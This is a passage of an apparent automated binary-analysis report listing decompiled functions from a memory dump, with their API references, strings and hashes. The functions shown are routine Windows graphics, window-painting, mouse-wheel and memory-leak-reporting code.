0xc)); _t84 = GetDeviceCaps( *(_v8 + 4), 0xe); _pop(_t85); _t86 = _t85 * _t84; if(_t86 > 8) { L4: _t87 = 0; } else { _t171 = *(_t192 + 0x28) & 0x0000ffff; if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) { _t87 = 1; } else { goto L4; } } if(_t87 == 0) { if(E004295F4(_t170) == 0) { SetStretchBltMode(E0042681C(_v8), 3); } } else { GetBrushOrgEx( *(_v8 + 4), &_v21); SetStretchBltMode( *(_v8 + 4), 4); SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y, &_v21); } _push(_t194); _push(0x4294a6); _push( *[fs:eax]); *[fs:eax] = _t196; if( *((intOrPtr*)( *_t170 + 0x28))() != 0) { E00429798(_t170, _t171); } E004268F8(E00429538(_t170), _t171, *0x4294b4 & 0x000000ff, _t190); if( *((intOrPtr*)( *_t170 + 0x28))() == 0) { StretchBlt( *(_v8 + 4), *_t190, _t190[1], _t190[2] - *_t190, _t190[3] - _t190[1], *(E00429538(_t170) + 4), 0, 0, *(_t192 + 0x1c), *(_t192 + 0x20), *(_v8 + 0x20)); _pop(_t184); *[fs:eax] = _t184; _push(0x4294ad); if(_v13 != 0) { return SelectPalette( *(_v8 + 4), _v12, 0xffffffff); } return 0; } else { _v32 = 0; _v28 = 0; _push(_t194); _push(0x42943b); _push( *[fs:eax]); *[fs:eax] = _t196; _v28 = E00426C14(CreateCompatibleDC(0)); _v32 = SelectObject(_v28, *(_t192 + 0xc)); E00426DC4( *(_v8 + 4), _t170, _t190[1], *_t190, _t190, _t192, 0, 0, _v28, *(_t192 + 0x20), *(_t192 + 0x1c), 0, 0, *(E00429538(_t170) + 4), _t190[3] - _t190[1], _t190[2] - *_t190); _t140 = 0; _pop(_t186); *[fs:eax] = _t186; _push(0x429480); if(_v32 != 0) { _t140 = SelectObject(_v28, _v32); } if(_v28 != 0) { return DeleteDC(_v28); } return _t140; } } 0x00429268 0x00429269 0x0042926b 0x00429271 0x00429273 0x00429276 0x00429278 0x00429285 0x0042928c 0x00429293 0x00429296 0x0042929a 0x0042929f 0x004292b0 0x004292ba 0x004292bf 0x004292bf 0x004292d1 0x004292db 0x004292e2 0x004292e3 0x004292e8 0x004292f9 0x004292f9 0x004292ea 0x004292ee 0x004292f7 0x004292fd 0x00000000 0x00000000 0x00000000 0x004292f7 0x00429301 0x00429344 0x00429351 0x00429351 0x00429303 0x0042930e 0x0042931c 0x00429334 0x00429334 0x00429358 0x00429359 0x0042935e 0x00429361 0x0042936d 0x00429371 0x00429371 0x00429384 0x00429392 0x0042947b 0x00429482 0x00429485 0x00429488 0x00429491 0x00000000 0x004294a0 0x004294a5 0x00429398 0x0042939a 0x0042939f 0x004293a4 0x004293a5 0x004293aa 0x004293ad 0x004293bc 0x004293cc 0x00429406 0x0042940b 0x0042940d 0x00429410 0x00429413 0x0042941c 0x00429426 0x00429426 0x0042942f 0x00000000 0x00429435 0x0042943a 0x0042943a

APIs

Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863 Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891 Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C SelectPalette.GDI32(?,?,000000FF), ref: 004292AB RealizePalette.GDI32(?), ref: 004292BA GetDeviceCaps.GDI32(?,0000000C), ref: 004292CC GetDeviceCaps.GDI32(?,0000000E), ref: 004292DB GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042930E SetStretchBltMode.GDI32(?,00000004), ref: 0042931C SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00429334 SetStretchBltMode.GDI32(00000000,00000003), ref: 00429351 CreateCompatibleDC.GDI32(00000000), ref: 004293B2 SelectObject.GDI32(?,?), ref: 004293C7 SelectObject.GDI32(?,00000000), ref: 00429426 DeleteDC.GDI32(00000000), ref: 00429435

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease String ID: API String ID: 2414602066-0 Opcode ID: e3fba3740f0dcb9a9556d00d241c3eff92958012f974742950326578c5eef44f Instruction ID: d82af69fe42d34c23c978d2582e61c5ab2b2549b478e9a14ed03732d0c903b0f Opcode Fuzzy Hash: e3fba3740f0dcb9a9556d00d241c3eff92958012f974742950326578c5eef44f Instruction Fuzzy Hash: 66714975B04214AFDB10EFA9D985F5AB7F8EF08304F51856AB509E7281D638ED018B68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%

E00426C24(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) { void* _v8; int _v12; int _v16; struct HBITMAP__* _v20; struct HDC__* _v24; struct HDC__* _v28; struct HDC__* _v32; int _v48; int _v52; void _v56; void* _t78; intOrPtr _t85; intOrPtr _t86; void* _t91; void* _t93; void* _t94; intOrPtr _t95; _t93 = _t94; _t95 = _t94 + 0xffffffcc; asm("movsd"); asm("movsd"); _t77 = __ecx; _v8 = __eax; _v28 = CreateCompatibleDC(0); _v32 = CreateCompatibleDC(0); _push(_t93); _push(0x426d72); _push( *[fs:eax]); *[fs:eax] = _t95; GetObjectA(_v8, 0x18, &_v56); if(__ecx == 0) { _v24 = GetDC(0); if(_v24 == 0) { E00426B6C(_t77); } _push(_t93); _push(0x426ce1); _push( *[fs:eax]); *[fs:eax] = _t95; _v20 = CreateCompatibleBitmap(_v24, _v16, _v12); if(_v20 == 0) { E00426B6C(_t77); } _pop(_t85); *[fs:eax] = _t85; _push(0x426ce8); return ReleaseDC(0, _v24); } else { _v20 = CreateBitmap(_v16, _v12, 1, 1, 0); if(_v20 != 0) { _t78 = SelectObject(_v28, _v8); _t91 = SelectObject(_v32, _v20); StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020); if(_t78 != 0) { SelectObject(_v28, _t78); } if(_t91 != 0) { SelectObject(_v32, _t91); } } _pop(_t86); *[fs:eax] = _t86; _push(0x426d79); DeleteDC(_v28); return DeleteDC(_v32); } } 0x00426c25 0x00426c27 0x00426c32 0x00426c33 0x00426c34 0x00426c36 0x00426c40 0x00426c4a 0x00426c4f 0x00426c50 0x00426c55 0x00426c58 0x00426c65 0x00426c6c 0x00426c8d 0x00426c94 0x00426c96 0x00426c96 0x00426c9d 0x00426c9e 0x00426ca3 0x00426ca6 0x00426cba 0x00426cc1 0x00426cc3 0x00426cc3 0x00426cca 0x00426ccd 0x00426cd0 0x00426ce0 0x00426c6e 0x00426c81 0x00426cec 0x00426cfb 0x00426d0a 0x00426d31 0x00426d38 0x00426d3f 0x00426d3f 0x00426d46 0x00426d4d 0x00426d4d 0x00426d46 0x00426d54 0x00426d57 0x00426d5a 0x00426d63 0x00426d71 0x00426d71

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00426C3B CreateCompatibleDC.GDI32(00000000), ref: 00426C45 GetObjectA.GDI32(?,00000018,?), ref: 00426C65 CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00426C7C GetDC.USER32(00000000), ref: 00426C88 CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00426CB5 ReleaseDC.USER32 ref: 00426CDB SelectObject.GDI32(?,?), ref: 00426CF6 SelectObject.GDI32(?,00000000), ref: 00426D05 StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00426D31 SelectObject.GDI32(?,00000000), ref: 00426D3F SelectObject.GDI32(?,00000000), ref: 00426D4D DeleteDC.GDI32(?), ref: 00426D63 DeleteDC.GDI32(?), ref: 00426D6C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch String ID: API String ID: 644427674-0 Opcode ID: 248f97220b1dff338e82754563a8b2f4f32af0637ae63b0437187d055089408d Instruction ID: f7b92c2e99590a9d5cfcba79e299e5576af21b756abce57799db81c34b4bedf2 Opcode Fuzzy Hash: 248f97220b1dff338e82754563a8b2f4f32af0637ae63b0437187d055089408d Instruction Fuzzy Hash: AC41F271F04219AFDB10EBE9D841FAFB7BCEB09704F524466B614F7281C67959108B68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E004073BC(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) { intOrPtr* _v8; struct HWND__* _t19; int* _t20; int* _t26; int* _t27; _t26 = _t20; _t27 = __edx; _v8 = __eax; _t19 = FindWindowA("MouseZ", "Magellan MSWHEEL"); *_v8 = RegisterWindowMessageA("MSWHEEL_ROLLMSG"); *_t27 = RegisterWindowMessageA("MSH_WHEELSUPPORT_MSG"); *_t26 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG"); if( *_t27 == 0 || _t19 == 0) { *_a8 = 0; } else { *_a8 = SendMessageA(_t19, *_t27, 0, 0); } if( *_t26 == 0 || _t19 == 0) { *_a4 = 3; } else { *_a4 = SendMessageA(_t19, *_t26, 0, 0); } return _t19; } 0x004073c3 0x004073c5 0x004073c7 0x004073d9 0x004073e8 0x004073f4 0x00407400 0x00407405 0x00407424 0x0040740b 0x0040741b 0x0040741b 0x00407429 0x00407446 0x0040742f 0x0040743f 0x0040743f 0x00407453

APIs

FindWindowA.USER32 ref: 004073D4 RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073E0 RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073EF RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073FB SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407413 SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00407437

Strings

MSH_WHEELSUPPORT_MSG , xrefs: 004073EA MouseZ , xrefs: 004073CF Magellan MSWHEEL , xrefs: 004073CA MSH_SCROLL_LINES_MSG , xrefs: 004073F6 MSWHEEL_ROLLMSG , xrefs: 004073DB

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Window$Register$Send$Find String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ API String ID: 3569030445-3736581797 Opcode ID: 10a1feeb794df7440b17b8e63e4a13679fef9cef35fe56b70c938976079f5b51 Instruction ID: c9e55c20fdb79de714cfc477ac30daadf041c9ce3ed2a91509b04cc45838add5 Opcode Fuzzy Hash: 10a1feeb794df7440b17b8e63e4a13679fef9cef35fe56b70c938976079f5b51 Instruction Fuzzy Hash: 9A111F70A48305AFE710AF65CC81B66BBA8EF45714F204177F944AB3C1D6B86D418B6A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%

E0042E248(void* __eax, void* __ecx, intOrPtr __edx) { intOrPtr _v8; struct HDC__* _v12; struct tagRECT _v28; struct tagRECT _v44; char _v56; char _v72; signed char _t43; signed int _t79; int _t80; int _t81; void* _t94; intOrPtr _t107; void* _t116; void* _t119; void* _t122; void* _t124; intOrPtr _t125; _t122 = _t124; _t125 = _t124 + 0xffffffbc; _t94 = __ecx; _v8 = __edx; _t116 = __eax; _t43 = GetWindowLongA(E004423F8(_v8), 0xffffffec); if((_t43 & 0x00000002) == 0) { return _t43; } else { GetWindowRect(E004423F8(_v8), &_v44); OffsetRect( &_v44, ~(_v44.left), ~(_v44.top)); _v12 = GetWindowDC(E004423F8(_v8)); _push(_t122); _push(0x42e3a3); _push( *[fs:edx]); *[fs:edx] = _t125; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t119 = _t116; if(_t94 != 0) { _t79 = GetWindowLongA(E004423F8(_v8), 0xfffffff0); if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) { _t80 = GetSystemMetrics("true"); _t81 = GetSystemMetrics(3); InflateRect( &_v28, 0xfffffffe, 0xfffffffe); E004193B4(_v28.right - _t80, _v28.right, _v28.bottom - _t81, &_v72, _v28.bottom); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t119 = _t119; FillRect(_v12, &_v28, GetSysColorBrush(0xf)); } } ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2); E0042DDE4( &_v56, 2); E0042DD38(_t119, &_v56, _v12, 0, &_v44); _pop(_t107); *[fs:eax] = _t107; _push(0x42e3aa); return ReleaseDC(E004423F8(_v8), _v12); } } 0x0042e249 0x0042e24b 0x0042e251 0x0042e253 0x0042e256 0x0042e263 0x0042e26b 0x0042e3b0 0x0042e271 0x0042e27e 0x0042e293 0x0042e2a6 0x0042e2ab 0x0042e2ac 0x0042e2b1 0x0042e2b4 0x0042e2be 0x0042e2bf 0x0042e2c0 0x0042e2c1 0x0042e2c2 0x0042e2c5 0x0042e2d2 0x0042e2dc 0x0042e2e7 0x0042e2f0 0x0042e2ff 0x0042e319 0x0042e325 0x0042e326 0x0042e327 0x0042e328 0x0042e329 0x0042e33a 0x0042e33a 0x0042e2dc 0x0042e35f 0x0042e36b 0x0042e37e 0x0042e385 0x0042e388 0x0042e38b 0x0042e3a2 0x0042e3a2

APIs

GetWindowLongA.USER32 ref: 0042E263 GetWindowRect.USER32 ref: 0042E27E OffsetRect.USER32(?,?,?), ref: 0042E293 GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E2A1 GetWindowLongA.USER32 ref: 0042E2D2 GetSystemMetrics.USER32 ref: 0042E2E7 GetSystemMetrics.USER32 ref: 0042E2F0 InflateRect.USER32(?,000000FE,000000FE), ref: 0042E2FF GetSysColorBrush.USER32(0000000F), ref: 0042E32C FillRect.USER32 ref: 0042E33A ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0042E3A3,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E35F ReleaseDC.USER32 ref: 0042E39D

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease String ID: API String ID: 19621357-0 Opcode ID: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3 Instruction ID: 957c21c96a165308dc8ebfbd5cc34ddb946f70638fe63c8bb3f5cff5665369c4 Opcode Fuzzy Hash: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3 Instruction Fuzzy Hash: 71413371E04119ABDB00EBA9DD42EDFB7BDEF49314F500166F914F7281CA79AE018764

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%

E0040262C(void* __eax, void* __fp0) { void* _v8; char _v110600; char _v112644; char _v112645; signed int _v112652; char _v112653; char _v112654; char _v112660; intOrPtr _v112664; intOrPtr _v112668; intOrPtr _v112672; struct HWND__* _v112676; signed short* _v112680; intOrPtr* _v112684; char _v129068; char _v131117; char _v161836; void* _v162091; signed char _v162092; void* _t73; int _t79; signed int _t126; int _t131; intOrPtr _t132; char* _t134; char* _t135; char* _t136; char* _t137; char* _t138; char* _t139; char* _t141; char* _t142; char* _t147; char* _t148; intOrPtr _t179; void* _t181; void* _t183; void* _t184; intOrPtr* _t187; intOrPtr* _t188; signed int _t193; void* _t196; void* _t197; void* _t210; _push(__eax); _t73 = 0x27; goto L1; L12: while(_t179 != 0x463708) { _t79 = E00402144(_t179); _t131 = _t79; __eflags = _t131; if(_t131 == 0) { L11: _t179 = *((intOrPtr*)(_t179 + 4)); continue; } else { goto L4; } do { L4: _t193 = *(_t131 - 4); __eflags = _t193 & 0x00000001; if((_t193 & 0x00000001) == 0) { __eflags = _t193 & 0x00000004; if(__eflags == 0) { __eflags = _v112652 - 0x1000; if(_v112652 < 0x1000) { _v112664 = (_t193 & 0xfffffff0) - 4; _t126 = E00402488(_t131, _t164); __eflags = _t126; if(_t126 == 0) { _v112645 = 0; _t164 = _v112664; *((intOrPtr*)(_t196 + _v112652 * 4 - 0x1f828)) = _v112664; _t18 = &_v112652; *_t18 = _v112652 + 1; __eflags = *_t18; } } } else { E004024E0(_t131, __eflags, _t196); } } _t79 = E00402120(_t131); _t131 = _t79; __eflags = _t131; } while (_t131 != 0); goto L11; } _t132 = *0x4657b0; // 0x4657ac while(_t132 != 0x4657ac && _v112652 < 0x1000) { _t79 = E00402488(_t132 + 0x10, _t164); __eflags = _t79; if(_t79 == 0) { _v112645 = 0; _t22 = _t132 + 0xc; // 0x0 _t79 = _v112652; *((intOrPtr*)(_t196 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4; _t27 = &_v112652; *_t27 = _v112652 + 1; __eflags = *_t27; } _t29 = _t132 + 4; // 0x4657ac _t132 = *_t29; } if(_v112645 != 0) { L48: return _t79; } _v112653 = 0; _v112668 = 0; _t134 = E004022DC(0x28, &_v161836); _v112660 = 0x37; _v112680 = 0x46103e; _v112684 = &_v110600; do { _v112672 = ( *_v112680 & 0x0000ffff) - 4; _v112654 = 0; _t181 = 0xff; _t187 = _v112684; while(_t134 <= &_v131117) { if( *_t187 > 0) { if(_v112653 == 0) { _t134 = E004022DC(0x27, _t134); _v112653 = 1; } if(_v112654 != 0) { *_t134 = 0x2c; _t139 = _t134 + 1; *_t139 = 0x20; _t140 = _t139 + 1; __eflags = _t139 + 1; } else { *_t134 = 0xd; *((char*)(_t134 + 1)) = 0xa; _t147 = E004021C0(_v112668 + 1, _t134 + 2); *_t147 = 0x20; _t148 = _t147 + 1; *_t148 = 0x2d; *((char*)(_t148 + 1)) = 0x20; _t140 = E004022DC(8, E004021C0(_v112672, _t148 + 2)); _v112654 = 1; } _t210 = _t181 - 1; if(_t210 < 0) { _t141 = E004022DC(7, _t140); } else { if(_t210 == 0) { _t141 = E004022DC(6, _t140); } else { E00403808( *((intOrPtr*)(_t187 - 4)), &_v162092); _t141 = E004022DC(_v162092 & 0x000000ff, _t140); } } *_t141 = 0x20; _t142 = _t141 + 1; *_t142 = 0x78; *((char*)(_t142 + 1)) = 0x20; _t134 = E004021C0( *_t187, _t142 + 2); } _t181 = _t181 - 1; _t187 = _t187 - 8; if(_t181 != 0xffffffff) { continue; } else { goto L37; } } L37: _v112668 = _v112672; _v112684 = _v112684 + 0x800; _v112680 = &(_v112680[0x10]); _t60 = &_v112660; *_t60 = _v112660 - 1; } while ( *_t60 != 0); if(_v112652 <= 0) { L47: E004022DC(3, _t134); _t79 = MessageBoxA(0, &_v161836, "Unexpected Memory Leak", 0x2010); goto L48; } if(_v112653 != 0) { *_t134 = 0xd; _t136 = _t134 + 1; *_t136 = 0xa; _t137 = _t136 + 1; *_t137 = 0xd; _t138 = _t137 + 1; *_t138 = 0xa; _t134 = _t138 + 1; } _t134 = E004022DC(0x3c, _t134); _t183 = _v112652 - 1; if(_t183 >= 0) { _t184 = _t183 + 1; _v112676 = 0; _t188 = &_v129068; L43: L43: if(_v112676 != 0) { *_t134 = 0x2c; _t135 = _t134 + 1; *_t135 = 0x20; _t134 = _t135 + 1; } _t134 = E004021C0( *_t188, _t134); if(_t134 > &_v131117) { goto L47; } _v112676 = &(_v112676->i); _t188 = _t188 + 4; _t184 = _t184 - 1; if(_t184 != 0) { goto L43; } } L1: _t197 = _t197 + 0xfffff004; _push(_t73); _t73 = _t73 - 1; if(_t73 != 0) { goto L1; } else { E00403264( &_v112644, 0x1b800); _t164 = 0x4000; E00403264( &_v129068, 0x4000); _t79 = 0; _v112652 = 0; _v112645 = 1; _t179 = *0x46370c; // 0x25e0000 goto L12; } } 0x0040262f 0x00402630 0x00402630 0x00000000 0x0040270b 0x0040268b 0x00402690 0x00402692 0x00402694 0x00402708 0x00402708 0x00000000 0x00000000 0x00000000 0x00000000 0x00402696 0x00402696 0x0040269b 0x0040269d 0x004026a3 0x004026a5 0x004026ab 0x004026b8 0x004026c2 0x004026ca 0x004026d2 0x004026d7 0x004026d9 0x004026db 0x004026e8 0x004026ee 0x004026f5 0x004026f5 0x004026f5 0x004026f5 0x004026d9 0x004026ad 0x004026b0 0x004026b5 0x004026ab 0x004026fd 0x00402702 0x00402704 0x00402704 0x00000000 0x00402696 0x00402717 0x00402756 0x00402724 0x00402729 0x0040272b 0x0040272d 0x00402734 0x00402740 0x00402746 0x0040274d 0x0040274d 0x0040274d 0x0040274d 0x00402753 0x00402753 0x00402753 0x00402771 0x004029cf 0x004029d5 0x004029d5 0x00402777 0x00402780 0x0040279b 0x0040279d 0x004027a7 0x004027b7 0x004027bd 0x004027c9 0x004027cf 0x004027d6 0x004027e1 0x004027e3 0x004027f4 0x00402801 0x00402814 0x00402816 0x00402816 0x00402824 0x00402875 0x00402878 0x00402879 0x0040287c 0x0040287c 0x00402826 0x00402826 0x0040282a 0x0040283c 0x0040283e 0x00402841 0x00402842 0x00402846 0x0040286a 0x0040286c 0x0040286c 0x0040287f 0x00402882 0x00402899 0x00402884 0x00402884 0x004028ae 0x00402886 0x004028bb 0x004028d4 0x004028d4 0x00402884 0x004028d6 0x004028d9 0x004028da 0x004028de 0x004028eb 0x004028eb 0x004028ed 0x004028ee 0x004028f4 0x00000000 0x00000000 0x00000000 0x00000000 0x004028f4 0x004028fa 0x00402900 0x00402906 0x00402910 0x00402917 0x00402917 0x00402917 0x0040292a 0x004029a6 0x004029b2 0x004029ca 0x00000000 0x004029ca 0x00402933 0x00402935 0x00402938 0x00402939 0x0040293c 0x0040293d 0x00402940 0x00402941 0x00402944 0x00402944 0x00402956 0x0040295e 0x00402961 0x00402963 0x00402964 0x0040296e 0x00000000 0x00402974 0x0040297b 0x0040297d 0x00402980 0x00402981 0x00402984 0x00402984 0x0040298e 0x00402998 0x00000000 0x00000000 0x0040299a 0x004029a0 0x004029a3 0x004029a4 0x00000000 0x00000000 0x004029a4 0x00402635 0x00402635 0x0040263b 0x0040263c 0x0040263d 0x00000000 0x0040263f 0x00402658 0x00402665 0x0040266a 0x0040266f 0x00402671 0x00402677 0x0040267e 0x00000000 0x0040267e

APIs

MessageBoxA.USER32 ref: 004029CA

Strings

, xrefs: 00402910 An unexpected memory leak has occurred. , xrefs: 0040278C Unexpected Memory Leak , xrefs: 004029BC String , xrefs: 0040289D 7 , xrefs: 0040279D bytes: , xrefs: 00402859 Unknown , xrefs: 00402888 The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945 The unexpected small block leaks are: , xrefs: 00402803

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown API String ID: 2030045667-32948583 Opcode ID: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1 Instruction ID: 23a8accc11e2490a14215b8d9e6836f2a0164065a38b33aa7325ad77d19b5dc4 Opcode Fuzzy Hash: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1 Instruction Fuzzy Hash: 14A1D930B042548BDF21AA2DC988BD976E5EB09314F1441FAE449BB3C2DBFD89C5CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

E0042328C(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) { struct tagPOINT _v12; int _v16; struct tagRECT _v32; struct tagRECT _v48; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t60; int _t61; RECT* _t64; struct HDC__* _t65; _t64 = _a8; _t65 = _a4; if( *0x46633f != 0) { _t61 = 0; if(_a12 == 0) { L14: return _t61; } _v32.left = 0; _v32.top = 0; _v32.right = GetSystemMetrics(0); _v32.bottom = GetSystemMetrics(1); if(_t65 == 0) { if(_t64 == 0 || IntersectRect( &_v32, &_v32, _t64) != 0) { L13: _t61 = _a12(0x12340042, _t65, &_v32, _a16); } else { _t61 = 1; } goto L14; } _v16 = GetClipBox(_t65, &_v48); if(GetDCOrgEx(_t65, &_v12) == 0) { goto L14; } OffsetRect( &_v32, ~(_v12.x), ~(_v12.y)); if(IntersectRect( &_v32, &_v32, &_v48) == 0 || _t64 != 0) { if(IntersectRect( &_v32, &_v32, _t64) != 0) { goto L13; } if(_v16 == 1) { _t61 = 1; } goto L14; } else { goto L13; } } *0x46632c = E00422CE4(7, _t60, *0x46632c, _t64, _t65); _t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16); goto L14; } 0x00423295 0x00423298 0x004232a2 0x004232d2 0x004232d8 0x00423394 0x0042339c 0x0042339c 0x004232e0 0x004232e5 0x004232f0 0x004232fb 0x00423300 0x00423369 0x00423381 0x00423392 0x0042337d 0x0042337d 0x0042337d 0x00000000 0x00423369 0x0042330c 0x0042331b 0x00000000 0x00000000 0x0042332d 0x00423345 0x0042335b 0x00000000 0x00000000 0x00423361 0x00423363 0x00423363 0x00000000 0x00000000 0x00000000 0x00000000 0x00423345 0x004232b6 0x004232cb 0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004232C5 GetSystemMetrics.USER32 ref: 004232EA GetSystemMetrics.USER32 ref: 004232F5 GetClipBox.GDI32(?,?), ref: 00423307 GetDCOrgEx.GDI32(?,?), ref: 00423314 OffsetRect.USER32(?,?,?), ref: 0042332D IntersectRect.USER32 ref: 0042333E IntersectRect.USER32 ref: 00423354 Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

EnumDisplayMonitors , xrefs: 004232A4

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc String ID: EnumDisplayMonitors API String ID: 362875416-2491903729 Opcode ID: f7d0f23d6495af1ec55020b5116113e54d63a9552e5b96eaa14a23c035d380cf Instruction ID: d52a89dab7af035f148b809b0392693c774d2fc3562edf481713e1b8ae1df2d7 Opcode Fuzzy Hash: f7d0f23d6495af1ec55020b5116113e54d63a9552e5b96eaa14a23c035d380cf Instruction Fuzzy Hash: 82312C72E04219AFDB10DFA598449EFB7BCAB09315F40412BFD11E2241EB7CDB018BA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

